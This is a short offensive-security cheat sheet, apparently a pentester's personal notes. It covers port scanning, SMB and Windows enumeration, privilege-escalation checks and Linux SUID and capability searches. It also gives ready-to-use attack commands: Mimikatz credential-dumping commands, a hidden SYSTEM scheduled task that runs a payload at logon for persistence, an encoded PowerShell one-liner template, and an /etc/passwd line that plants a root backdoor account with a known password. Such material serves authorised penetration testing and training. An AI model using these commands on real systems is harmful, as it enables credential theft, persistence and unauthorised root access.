# Misc Offensive Cheat Sheet

You probably already know all of that, but, since I (re-)discovered all of that recently, or learned that recently, or I always search these details without knowing it by heart, here is my small cheat sheet for pentest, hoping to remember it soon.

## Port Scanning

### `nc` UDP Port Scanning

```sh
nc -nvv -w 1 -z <IP> <PORT_START>-<PORT_END>
```

* `-u` is for **UDP**
* `-z` is for **Zero**


### Powershell Port Scanning

```pwsh
Test-NetConnection -Port 445 <IP> <PORT_START>..<PORT_END> | % {echo ((New-Object Net.Sockets.TcpClient).Connect("<IP>", $_)) "TCP port $_ is open"} 2>$null
```

## [TCP/80] HTTP

### Avoid Curl to re-encode the URL

```sh
curl --path-as-it ...
```

### Microsoft IIS structure

* `C:\inetpub`
    - `custerr\`
    - `history\`
    - `logs\`
    - `temp\`
    - `wwwroot\`


## [TCP/162] SNMP MIB values

| MIB                      | Value            |
|--------------------------|------------------|
| `1.3.6.1.2.1.25.1.6.0`   | System Processes |
| `1.3.6.1.2.1.25.4.2.1.2` | Running Programs |
| `1.3.6.1.2.1.25.4.2.1.4` | Processes Path   |
| `1.3.6.1.2.1.25.2.3.1.4` | Storage Units    |
| `1.3.6.1.2.1.25.6.3.1.2` | Software Name    |
| `1.3.6.1.4.1.77.1.2.25`  | User Accounts    |
| `1.3.6.1.2.1.6.13.1.3`   | TCP Local Ports  |
| `1.3.6.1.4.1.77.1.2.25`  | List Users       |
/// caption
Windows Known MIB
///


## [TCP/445] SMB Enumeration

* Think about the NULL and the guest credentials!
* On linux:
    * `enum4linux`
    * `nbtenum`
    * `enum4linux-ng`
* On Windows:
    * `net view`
    * `enum.exe` (from `enum4linux`)

## Powershell

### `find / -type f -iname` equivalent

```pwsh
Get-ChildItem -Path C:\ -Include *.kdbx,*.txt -File -Recurse -ErrorAction SilentlyContinue
```

### List local users

List the local users, including the disabled one

```pwsh
Get-LocalUser
```

or

```
net user
```

### List local groups

```pwsh
Get-LocalGroup
```

or

```
net localgroup
```

#### Get members of a local group

```
Get-LocalGroupMember Administrators
```

or

```
net localgroup Administrators
```

### List uninstallers

```powershell
Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
```

### One-Liner

```pwsh
powershell.exe -enc {{BASE64-Encoded of the UTF-16LE commands!}}
```

### Add a Schedule task with principals

```pwsh
$taskAction = New-ScheduledTaskAction -Execute 'C:\msfvenom.exe'
$taskTrigger = New-ScheduledTaskTrigger -AtLogOn
$principal = New-ScheduledTaskPrincipal -UserID "NT AUTHORITY\SYSTEM" -LogonType ServiceAccount -RunLevel Highest
$TaskSettings = New-ScheduledTaskSettingsSet -Hidden -Compatibility Win8 -DontStopIfGoingOnBatteries -Priority 0 -AllowStartIfOnBatteries
Register-ScheduledTask -TaskName 'EnforcedModeSnapBack' -Action $taskAction -Trigger $taskTrigger -Principal $principal
```

### Get Powershell History file

```pwsh
(Get-PSReadlineOption).HistorySavePath
```

### Get unquoted path for services

```pwsh
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | findstr /v /c:'C:\Windows\'
```

### List scheduled tasks

```pwsh
schtasks.exe /query /fo list /v | findstr /b /c:'Task To Run:' | findstr /v /c:'COM handler' | findstr /i /v '%SystemRoot%' | findstr /i /v '%windir%'
```

## Mimikatz commands

```
privilege::debug
token::elevate
lsadump::sam
sekurlsa::logonpasswords
misc::memssp
```

[The other commands](https://github.com/gentilkiwi/mimikatz/?tab=readme-ov-file#quick-usage)

## Linux shell

### Firewall configuration files

- `/etc/iptables/rules.v4`
- `/etc/iptables/rules.v6`
- `/etc/nftables.conf`

### Find world writable directories

```sh
find / -writable -type d 2>/dev/null
```

### Find SUID files

```sh
find / -perm -u=s -type f 2>/dev/null
```

### Find files with special capabilities

```sh
/usr/sbin/getcap -r / 2>/dev/null
```

### Editable `/etc/passwd`

Add to `/etc/passwd` the following line:

```
mothertheresa:$1$zujPJl1N$la4ibRnP5V0da8EY90WXb1:0:0:root:/root:/bin/bash
```

Now, the user `mothertheresa` is actually root and has the password `toor`.
